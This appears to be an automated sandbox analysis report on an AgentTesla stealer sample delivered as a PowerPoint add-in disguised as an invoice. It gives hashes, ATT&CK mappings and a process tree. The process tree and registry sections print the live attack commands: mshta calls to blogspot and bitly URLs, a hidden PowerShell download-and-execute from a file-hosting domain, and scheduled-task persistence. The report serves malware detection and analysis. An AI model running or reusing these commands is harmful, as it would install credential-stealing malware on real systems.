agenttesla | b56a00462c6fdfd3fc68869ecda35f6832bee4cdcb81e06bf85b3e4c3336fd77

General

Target

Invoice 140923.ppam
Size

8KB
MD5

5d1279434725ccad24da08658d073a23
SHA1

5bd8e406df2a5547bf74fefde17a6a7e4b51358e
SHA256

b56a00462c6fdfd3fc68869ecda35f6832bee4cdcb81e06bf85b3e4c3336fd77
SHA512

9977a2a96b7aa32d4268423adef7b5cee2ae36e7aa6c42a886f1003c845cf71cccd14b6d3e264e0b637a9a2f2f19236d885c75cf60b9d3a5f2a8598a6ddc68f6

Score

10^/10

agenttesla collection keylogger persistence spyware stealer trojan

Malware Config

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

mshta.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	2188	3612	mshta.exe	POWERPNT.EXE

AgentTesla Payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2036-325-0x000000000043752E-mapping.dmp	family_agenttesla
behavioral2/memory/3204-392-0x000000000043752E-mapping.dmp	family_agenttesla
behavioral2/memory/3204-398-0x0000000004CD0000-0x00000000051CE000-memory.dmp	family_agenttesla

Blocklisted process makes network request 11 IoCs

Processes:

mshta.exepowershell.exe

flow	pid	process
33	2188	mshta.exe
36	2188	mshta.exe
41	2188	mshta.exe
43	2188	mshta.exe
47	2188	mshta.exe
50	2188	mshta.exe
51	2188	mshta.exe
53	2188	mshta.exe
54	2188	mshta.exe
56	2188	mshta.exe
58	2300	powershell.exe

Drops file in Drivers directory 2 IoCs

Processes:

jsc.exeRegAsm.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	jsc.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	RegAsm.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs

collection

Email Collection

T1114

Processes:

jsc.exeRegAsm.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cleanreasdasdddsults = "\"MsHta\"\"http://1230948%1230948@machearkalonikahdi.blogspot.com/p/15.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\takeCare = "pOweRshell.exe -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_b0f3ef832df447e0b4540d1b55406b51.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_1bc433a276794dd08a29271d95e2f910.txt').GetResponse().GetResponseStream()).ReadToend());"	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\SAFEsounkkkd = "\"MsHta\"\"http://1230948%1230948@migimigichuchuchacha.blogspot.com/p/15.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Milalaasdasdlalal = "\"MsHta\"\"http://1230948%1230948@gagamutakakachota.blogspot.com/p/15.html\""	mshta.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.exe

description	pid	process	target process
PID 2300 set thread context of 2036	2300	powershell.exe	jsc.exe
PID 2300 set thread context of 3204	2300	powershell.exe	RegAsm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1460 schtasks.exe

pid	process
1460	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE

Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

4636 taskkill.exe
4788 taskkill.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

POWERPNT.EXE

pid process

3612 POWERPNT.EXE
Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

dw20.exepowershell.exejsc.exeRegAsm.exe

pid process

3440 dw20.exe
3440 dw20.exe
2300 powershell.exe
2300 powershell.exe
2300 powershell.exe
2036 jsc.exe
2036 jsc.exe
3204 RegAsm.exe
3204 RegAsm.exe
Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

RegAsm.exe

pid process

3204 RegAsm.exe

pid	process
4636	taskkill.exe
4788	taskkill.exe

pid	process
3612	POWERPNT.EXE

pid	process
3440	dw20.exe
3440	dw20.exe
2300	powershell.exe
2300	powershell.exe
2300	powershell.exe
2036	jsc.exe
2036	jsc.exe
3204	RegAsm.exe
3204	RegAsm.exe

pid	process
3204	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

taskkill.exetaskkill.exepowershell.exejsc.exeRegAsm.exe

description	pid	process
Token: SeDebugPrivilege	4636	taskkill.exe
Token: SeDebugPrivilege	4788	taskkill.exe
Token: SeDebugPrivilege	2300	powershell.exe
Token: SeDebugPrivilege	2036	jsc.exe
Token: SeDebugPrivilege	3204	RegAsm.exe

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

POWERPNT.EXEjsc.exeRegAsm.exe

pid process

3612 POWERPNT.EXE
3612 POWERPNT.EXE
3612 POWERPNT.EXE
2036 jsc.exe
3204 RegAsm.exe

pid	process
3612	POWERPNT.EXE
3612	POWERPNT.EXE
3612	POWERPNT.EXE
2036	jsc.exe
3204	RegAsm.exe

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

POWERPNT.EXEmshta.exepowershell.execsc.exe

description	pid	process	target process
PID 3612 wrote to memory of 2188	3612	POWERPNT.EXE	mshta.exe
PID 3612 wrote to memory of 2188	3612	POWERPNT.EXE	mshta.exe
PID 2188 wrote to memory of 4636	2188	mshta.exe	taskkill.exe
PID 2188 wrote to memory of 4636	2188	mshta.exe	taskkill.exe
PID 2188 wrote to memory of 4788	2188	mshta.exe	taskkill.exe
PID 2188 wrote to memory of 4788	2188	mshta.exe	taskkill.exe
PID 2188 wrote to memory of 1460	2188	mshta.exe	schtasks.exe
PID 2188 wrote to memory of 1460	2188	mshta.exe	schtasks.exe
PID 2188 wrote to memory of 2300	2188	mshta.exe	powershell.exe
PID 2188 wrote to memory of 2300	2188	mshta.exe	powershell.exe
PID 2188 wrote to memory of 3440	2188	mshta.exe	dw20.exe
PID 2188 wrote to memory of 3440	2188	mshta.exe	dw20.exe
PID 2300 wrote to memory of 2036	2300	powershell.exe	jsc.exe
PID 2300 wrote to memory of 2036	2300	powershell.exe	jsc.exe
PID 2300 wrote to memory of 2036	2300	powershell.exe	jsc.exe
PID 2300 wrote to memory of 2036	2300	powershell.exe	jsc.exe
PID 2300 wrote to memory of 2036	2300	powershell.exe	jsc.exe
PID 2300 wrote to memory of 2036	2300	powershell.exe	jsc.exe
PID 2300 wrote to memory of 2036	2300	powershell.exe	jsc.exe
PID 2300 wrote to memory of 2036	2300	powershell.exe	jsc.exe
PID 2300 wrote to memory of 4068	2300	powershell.exe	csc.exe
PID 2300 wrote to memory of 4068	2300	powershell.exe	csc.exe
PID 4068 wrote to memory of 2172	4068	csc.exe	cvtres.exe
PID 4068 wrote to memory of 2172	4068	csc.exe	cvtres.exe
PID 2300 wrote to memory of 3204	2300	powershell.exe	RegAsm.exe
PID 2300 wrote to memory of 3204	2300	powershell.exe	RegAsm.exe
PID 2300 wrote to memory of 3204	2300	powershell.exe	RegAsm.exe
PID 2300 wrote to memory of 3204	2300	powershell.exe	RegAsm.exe
PID 2300 wrote to memory of 3204	2300	powershell.exe	RegAsm.exe
PID 2300 wrote to memory of 3204	2300	powershell.exe	RegAsm.exe
PID 2300 wrote to memory of 3204	2300	powershell.exe	RegAsm.exe
PID 2300 wrote to memory of 3204	2300	powershell.exe	RegAsm.exe

outlook_office_path 1 IoCs

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

outlook_win_path 1 IoCs

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\Invoice 140923.ppam" /ou ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3612

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" https://www.bitly.com/wdowdpowdlwdprufhjwijjd
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2188

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im winword.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4636

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im Excel.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4788

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_b0f3ef832df447e0b4540d1b55406b51.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_1bc433a276794dd08a29271d95e2f910.txt').GetResponse().GetResponseStream()).ReadToend());
3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2300

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
4⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2036

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1241ci5p\1241ci5p.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:4068

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2B13.tmp" "c:\Users\Admin\AppData\Local\Temp\1241ci5p\CSCD51FD894AC144AEAA2F987FF16747D16.TMP"
5⤵
PID:2172

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
PID:3204

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr ""\""MsHtA""\""http://1230948%1230948@kumakahchachi.blogspot.com/p/15.html\""
3⤵
- Creates scheduled task(s)
PID:1460

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
dw20.exe -x -s 2912
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3440

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Registry Run Keys / Startup Folder

1

T1060

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

1

T1112

Credential Access

Credentials in Files

3

T1081

Discovery

System Information Discovery

3

T1082

Query Registry

2

T1012

Lateral Movement

Collection

Data from Local System

3

T1005

Email Collection

1

T1114

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1241ci5p\1241ci5p.dll
MD5
c387386dec8391ecf3027d668c487923

SHA1
984444fbd377dbcffe8ba2761de24ddd0cc6fac4

SHA256
1ae5d2f24f53d966cee4e62ab3a2fe92bee19ba85cab4165b3200af2fc9c39de

SHA512
bad92c568cb6b92719483290b459e24ffb5d44dae881e85064e62da6a857bd355ad0413cc2957f3d6a4b2eee1f62e4f43b89dcf17879a63af92a1f5df6cc483b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES2B13.tmp
MD5
c1ca2418445211426574599aa341f3e3

SHA1
af5db3ed03a9aa37bd5ad8dd2dd7e75eb3c94a40

SHA256
17a5e183c9e68e2f781cba0f56c5481914fb69e55abebb108baf3499150675aa

SHA512
d791a5199a016267bee9c41e48416e28a3f8fac2a866ec430f7b11c54b0c50fef5e3e85f7428947573721358fd6ac2005202eb22c33f941d4205868e0a0fd322

Download Submit
C:\Windows\system32\drivers\etc\hosts
MD5
5b2d17233558878a82ee464d04f58b59

SHA1
47ebffcad0b4c358df0d6a06ef335cb6aab0ab20

SHA256
5b036588bb4cad3de01dd04988af705da135d9f394755080cf9941444c09a542

SHA512
d2aec9779eb8803514213a8e396b2f7c0b4a6f57de1ee84e9db0343ee5ff093e26bb70e0737a6681e21e88898ef5139969ff0b4b700cb6727979bd898fdbc85b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1241ci5p\1241ci5p.0.cs
MD5
e03b1e7ba7f1a53a7e10c0fd9049f437

SHA1
3bb851a42717eeb588eb7deadfcd04c571c15f41

SHA256
3ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427

SHA512
a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1241ci5p\1241ci5p.cmdline
MD5
a83664a824d1bbad36c9b129c994107a

SHA1
ef12ce920e87c2ecb624cdcb024e045de8c575f8

SHA256
2011b1d55fb39b05b420ea8c13787a5a9ee3ac79ec918c336cc26f669e1506ac

SHA512
7b4a316f815ced28db84c494ebf939d9b824bb5cbc224e3ff5a0b91ae4173a67d846e4312d07fee9872d1beaa4f3fa08f7d495d212c8987f3348f70715427b0f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1241ci5p\CSCD51FD894AC144AEAA2F987FF16747D16.TMP
MD5
aa68a47ab2b40d3fb10ed97e9c72015c

SHA1
99037f728e0a4c560c04444475b70e593fb545a4

SHA256
6787a5493494d3f5d0ade491e5bef8873a343843318d85cf5b42acc567d95213

SHA512
ea5f713046ee276896504d295de71bbb5c74e40f3e8acc8a4da8f123e93003eb7ad96003138ea5bc103a85f712673d8f0981e65a8a7a0113650374970240b4ca

Download Submit
memory/1460-301-0x0000000000000000-mapping.dmp

Download
memory/2036-407-0x0000000005640000-0x0000000005B3E000-memory.dmp

Filesize
5.0MB

Download
memory/2036-325-0x000000000043752E-mapping.dmp

Download
memory/2036-334-0x0000000005640000-0x0000000005B3E000-memory.dmp

Filesize
5.0MB

Download
memory/2172-386-0x0000000000000000-mapping.dmp

Download
memory/2188-263-0x0000000000000000-mapping.dmp

Download
memory/2300-302-0x0000000000000000-mapping.dmp

Download
memory/2300-318-0x0000016879E86000-0x0000016879E88000-memory.dmp

Filesize
8KB

Download
memory/2300-316-0x0000016879E80000-0x0000016879E82000-memory.dmp

Filesize
8KB

Download
memory/2300-317-0x0000016879E83000-0x0000016879E85000-memory.dmp

Filesize
8KB

Download
memory/3204-409-0x0000000004CD0000-0x00000000051CE000-memory.dmp

Filesize
5.0MB

Download
memory/3204-392-0x000000000043752E-mapping.dmp

Download
memory/3204-398-0x0000000004CD0000-0x00000000051CE000-memory.dmp

Filesize
5.0MB

Download
memory/3440-303-0x0000000000000000-mapping.dmp

Download
memory/3612-120-0x0000024175E50000-0x0000024175E52000-memory.dmp

Filesize
8KB

Download
memory/3612-128-0x00007FFB4EDD0000-0x00007FFB4EDE0000-memory.dmp

Filesize
64KB

Download
memory/3612-116-0x00007FFB51920000-0x00007FFB51930000-memory.dmp

Filesize
64KB

Download
memory/3612-117-0x00007FFB51920000-0x00007FFB51930000-memory.dmp

Filesize
64KB

Download
memory/3612-248-0x00000241074D0000-0x00000241074D4000-memory.dmp

Filesize
16KB

Download
memory/3612-129-0x00007FFB4EDD0000-0x00007FFB4EDE0000-memory.dmp

Filesize
64KB

Download
memory/3612-118-0x00007FFB51920000-0x00007FFB51930000-memory.dmp

Filesize
64KB

Download
memory/3612-122-0x0000024175E50000-0x0000024175E52000-memory.dmp

Filesize
8KB

Download
memory/3612-119-0x0000024175E50000-0x0000024175E52000-memory.dmp

Filesize
8KB

Download
memory/3612-115-0x00007FFB51920000-0x00007FFB51930000-memory.dmp

Filesize
64KB

Download
memory/3612-121-0x00007FFB51920000-0x00007FFB51930000-memory.dmp

Filesize
64KB

Download
memory/4068-383-0x0000000000000000-mapping.dmp

Download
memory/4636-299-0x0000000000000000-mapping.dmp

Download
memory/4788-300-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads